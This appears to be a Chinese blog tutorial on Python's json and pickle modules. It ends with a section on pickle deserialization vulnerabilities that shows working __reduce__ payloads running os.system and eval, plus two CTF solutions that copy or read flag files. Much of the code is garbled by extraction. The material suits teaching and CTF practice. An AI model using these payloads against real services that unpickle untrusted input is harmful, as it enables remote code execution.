python反序列化漏洞以及JSON模块和pickle模块 序列化是什么 序列化 (Serialization)是将对象的状态信息 转换为可以存储或传输的形式 的过程。
反序列化是什么 反序列化 (Deserialization)是将有序的二进制序列 转换成某种对象 (字典,列表等)的过程。
为什么要序列化? 1、存储
一个软件/程序的执行就在处理一系列状态的变化。
在编程语言中,“状态”会以各种各样有结构的数据类型 (也可简单的理解为变量 )的形式被保存在内存中。
内存 无法永久保存数据,当程序运行一段时间,断电或者重启程序,内存中关于这个程序的一些数据就被清空 了。
在断电或重启程序之前将程序当前内存中所有的数据都保存 下来,以便于下次程序执行能够从文件中载入之前的数据就是序列化 。
2、传输
因为TCP/IP协议只支持字节数组 的传输,不能直接传对象 。
对象序列化的结果一定是字节数组!
当两个进程在进行远程通信时,彼此可以发送各种类型的数据。无论是何种类型的数据,都会以二进制序列 的形式在网络上传送。
发送方需要把这个对象转换为字节序列,才能在网络上传送;接收方则需要把字节序列再恢复为对象。
如果收发的双方约定好实用一种序列化的格式,那么便打破了平台/语言差异化 带来的限制,实现了跨平台数据交互 !
JSON JSON(JavaScript Object Notation, JS 对象简谱) 是一种轻量级的数据交换格式 。
采用完全独立于编程语言的文本格式来存储和表示数据。
简洁和清晰的层次结构使得 JSON 成为理想的数据交换语言。
易于人阅读和编写,同时也易于机器解析和生成,并有效地提升网络传输效率。
JSON表示出来就是一个字符串 ,可以被所有语言读取 ,也可以方便地存储 到磁盘或者通过网络传输 。
JSON不仅是标准格式,并且比XML更快,而且可以直接在Web页面中读取 ,非常方便。
JSON模块 Python3 中可以使用 json 模块来对 JSON 数据进行编解码,它主要提供了四个方法: dump、dumps、load、loads。
dump和dumps对python对象进行序列化 。将一个Python对象进行JSON格式的编码。
load和loads反序列化方法,将json格式数据解码为Python对象。
JSON模块实例 dump和dumps函数 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 import jsonprint (data1, type (data1))2 ) print (data2, type (data2))'3' ) print (data3, type (data3))dict = {"name" : "Tom" , "age" : 18 } dict )print (data4, type (data4))with open ("test.json" , "w" , encoding='utf-8' ) as f:dict , indent=4 ))dict , f, indent=4 )
得到的输出结果如下(格式化所有的数据类型为str类型):
1 2 3 4 [] <class 'str' >2 <class 'str' >"3" <class 'str' >"name" : "Tom" , "age" : 18 } <class 'str' >
test.json中的内容:
1 2 3 4 { "name" : "Tom" , "age" : 18 }
load和loads函数 1 2 3 4 5 6 7 8 9 10 11 12 import jsondict = '{"name": "Tom", "age": 18}' dict )print (data1, type (data1))with open ("test.json" , "r" , encoding='utf-8' ) as f:print (data2, type (data2))0 ) print (data3, type (data3))
运行结果如下:
1 2 3 {'name' : 'Tom' , 'age' : 18 } <class 'dict '>'name' : 'Tom' , 'age' : 18 } <class 'dict '>'name' : 'Tom' , 'age' : 18 } <class 'dict '>
读取多行的JSON文件 假如要读取一个多行的JSON文件:
1 2 3 4 5 6 {"坂" : ["坂5742" ]}"构" : ["构6784" ]}"共" : ["共5171" ]}"钩" : ["钩94a9" ]}"肮" : ["肮80ae" ]}"孤" : ["孤5b64" ]}
如果直接使用:
1 2 with open (json_path, 'r' ) as f:load (f)
就会报错:抛出异常JSONDecodeError 。
因为json只能读取一个文档对象 ,有两个解决办法:
1、单行读取文件
1 2 3 4 5 with open (json_path, 'r' ) as f:for line in f.readlines():if len (line) != 0 :
2、合并为一个对象
将json文件处理成一个对象文件:
1 2 3 4 5 6 7 8 {"dict" : ["坂" : ["坂5742" ]},"构" : ["构6784" ]},"共" : ["共5171" ]},"钩" : ["钩94a9" ]},"肮" : ["肮80ae" ]},"孤" : ["孤5b64" ]}
然后再用:
1 2 with open (json_path, 'r' ) as f:
pickle模块 pickle模块实现了用于对Python对象结构进行 序列化 和 反序列化 的二进制协议 ,与json模块不同的是pickle模块序列化和反序列化的过程分别叫做 pickling 和 unpickling:
*pickling:* 是将Python对象转换为字节流的过程;
*unpickling:* 是将字节流二进制文件或字节对象转换回Python对象的过程;
pickle模块与json模块对比
JSON是一种文本序列化格式(它输出的是unicode文件,大多数时候会被编码为utf-8),而pickle是一个二进制序列化格式;
JOSN是我们可以读懂的数据格式,而pickle是二进制格式,我们无法读懂;
JSON是与特定的编程语言或系统无关的,且它在Python生态系统之外被广泛使用,而pickle使用的数据格式是特定于Python的;
默认情况下,JSON只能表示Python内建数据类型,对于自定义数据类型需要一些额外的工作来完成;pickle可以直接表示大量的Python数据类型,包括自定数据类型(其中,许多是通过巧妙地使用Python内省功能自动实现的;复杂的情况可以通过实现specific object API来解决)
1 2 3 4 5 6 7 8 9 10 11 protocol =None, *, fix_imports =True )fix_imports =True , encoding ="ASCII" , errors ="strict" )protocol =None, *, fix_imports =True )fix_imports =True , encoding ="ASCII" , errors ="strict" )
pickle模块实例 python 2.X 1 2 3 4 5 6 7 8 9 10 11 12 13 >>> import pickle>>> >>> var_a = {'a' :'str' , 'c' : True , 'e' : 10 , 'b' : 11.1 , 'd' : None , 'f' : [1 , 2 , 3 ], 'g' :(4 , 5 , 6 )}>>> var_b = pickle.dumps(var_a)>>> var_b"(dp0\nS'a'\np1\nS'str'\np2\nsS'c'\np3\nI01\nsS'b'\np4\nF11.1\nsS'e'\np5\nI10\nsS'd'\np6\nNsS'g'\np7\n(I4\nI5\nI6\ntp8\nsS'f'\np9\n(lp10\nI1\naI2\naI3\nas." >>> var_c = pickle.loads(var_b)>>> var_c'a' : 'str' , 'c' : True , 'b' : 11.1 , 'e' : 10 , 'd' : None , 'g' : (4 , 5 , 6 ), 'f' : [1 , 2 , 3 ]}
python 3.X 1 2 3 4 5 6 7 8 9 10 11 12 13 >>> import pickle>>> var_a = {'a' :'str' , 'c' : True , 'e' : 10 , 'b' : 11.1 , 'd' : None , 'f' : [1 , 2 , 3 ], 'g' :(4 , 5 , 6 )}>>> var_b = pickle.dumps(var_a)>>> var_bb'\x80\x03}q\x00(X\x01\x00\x00\x00eq\x01K\nX\x01\x00\x00\x00aq\x02X\x03\x00\x00\x00strq\x03X\x01\x00\x00\x00fq\x04]q\x05(K\x01K\x02K\x03eX\x01\x00\x00\x00gq\x06K\x04K\x05K\x06\x87q\x07X\x01\x00\x00\x00bq\x08G@&333333X\x01\x00\x00\x00cq\t\x88X\x01\x00\x00\x00dq\nNu.' >>> var_c = pickle.loads(var_b)>>> var_c'e' : 10 , 'a' : 'str' , 'f' : [1 , 2 , 3 ], 'g' : (4 , 5 , 6 ), 'b' : 11.1 , 'c' : True , 'd' : None }
dump()与load() 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 >>> import pickle>>> >>> var_a = {'a' :'str' , 'c' : True , 'e' : 10 , 'b' : 11.1 , 'd' : None , 'f' : [1 , 2 , 3 ], 'g' :(4 , 5 , 6 )} >>> with open ('pickle.txt' , 'wb' ) as f:... pickle.dump(var_a, f) ... >>> with open ('pickle.txt' , 'rb' ) as f:... var_b = pickle.load(f) ... >>> var_b >>>
说明:
默认情况下Python 2.x中pickled后的数据是字符串形式,需要将它转换为字节对象才能被Python 3.x中的pickle.loads()反序列化;Python 3.x中pickling所使用的协议是v3,因此需要在调用pickle.dumps()时指定可选参数protocol为Python 2.x所支持的协议版本(0,1,2),否则pickled后的数据不能被被Python 2.x中的pickle.loads()反序列化;
Python 3.x中pickle.dump()和pickle.load()方法中指定的文件对象,必须以二进制模式打开,而Python 2.x中可以以二进制模式打开,也可以以文本模式打开。
python反序列化漏洞 python序列化反序列化相关函数 1 2 3 4 pickle.dump :将对象序列化后保存到文件。
python魔术方法
reduce () :反序列化时调用。reduce_ex () :反序列化时调用。setstate () :反序列化时调用。getstate () :序列化时调用。
python魔术方法实例详解 <__reduce__> 代码实例
1 2 3 4 5 6 7 8 9 10 11 12 13 import pickleimport osclass A (object ): def __reduce__(self ): print('反序列化调用') return (os .system ,('calc' ,)) a = A () p_a = pickle.dumps(a ) pickle.loads(p_a ) print('==========') print(p_a )
输出
1 2 3 4 5 //弹计算机= = = = = = = = = = = x 80 \x 04 \x 95 \x 1 c \x 00 \x 00 \x 00 \x 00 \x 00 \x 00 \x 00 \x 8 c \x 02 nt\x 94 \x 8 c \x 06 system\x 94 \x 93 \x 94 \x 8 c \x 04 calc\x 94 \x 85 \x 94 R\x 94 .'
<__setstate__> 1 2 3 4 5 6 7 8 9 10 11 12 import pickleclass SerializePerson ():def __init__ (self , nameself .name = namedef __setstate__ (self , name'calc' ) SerializePerson ('tom' ))
1 2 3 4 5 //弹计算机= = = = = = = = = = = x 80 \x 04 \x 95 \x 1 c \x 00 \x 00 \x 00 \x 00 \x 00 \x 00 \x 00 \x 8 c \x 02 nt\x 94 \x 8 c \x 06 system\x 94 \x 93 \x 94 \x 8 c \x 04 calc\x 94 \x 85 \x 94 R\x 94 .'
<__getstate__> 1 2 3 4 5 6 7 8 9 10 11 12 import pickleimport osclass A (object ):def __getstate__ (self ):print ('序列化调用' )'calc' ) print ('===========' )print (p_a)
//弹计算机
1 2 3 序列化调用 =========== __main__ \x94\x8c\x01A\x94\x93\x94)\x81\x94.'
漏洞利用 先构造exp
1 2 3 4 5 6 7 8 9 10 import osimport pickleclass Demo (object ): def __reduce__(self ): shell = 'calc' return (os .system ,(shell ,)) demo = Demo () pickle.loads(pickle .dumps (demo ))
然后根据题目的要求比如base64编码之类的对payload进行处理,然后传入即可。
例题:signning exp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 import os import requests from bottle import cookie_encode import warnings "ignore" , category=DeprecationWarning) "Hell0_H@cker_Y0u_A3r_Sm@r7" class Test : def __reduce__ (self ): return (eval , ("""__import__('os').system('cp /f* ./2.txt')""" ,)) 'session' , {"name" : [Test()]}), 'http://gz.imxbt.cn:20805/secret' , cookies={'name' : exp.decode()})
例题:ikun 在这题的源码中能看到调用序列化的函数
1 2 3 4 5 6 7 8 @tornado.web.authenticated def post (self,*args,**kwargs )try :self .get_argument('become' )return self .render('form.html' ,res=p,member=1 )except :return self .render('form.html' ,res='This is Black' )
经过分析得知其是python2进行编码的,因此我们使用python构造payload
1 2 3 4 5 6 7 8 import pickleimport urllibclass payload (object ):def __reduce__ (self ):return (eval ,("open('/flag.txt','r').read()" ,))print (a)
执行后可以看到成功构造了payload。
将value的值改成我们刚刚生成的payload
更改后再次点击一键成为大会员,可以看到成功获取到了flag。
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。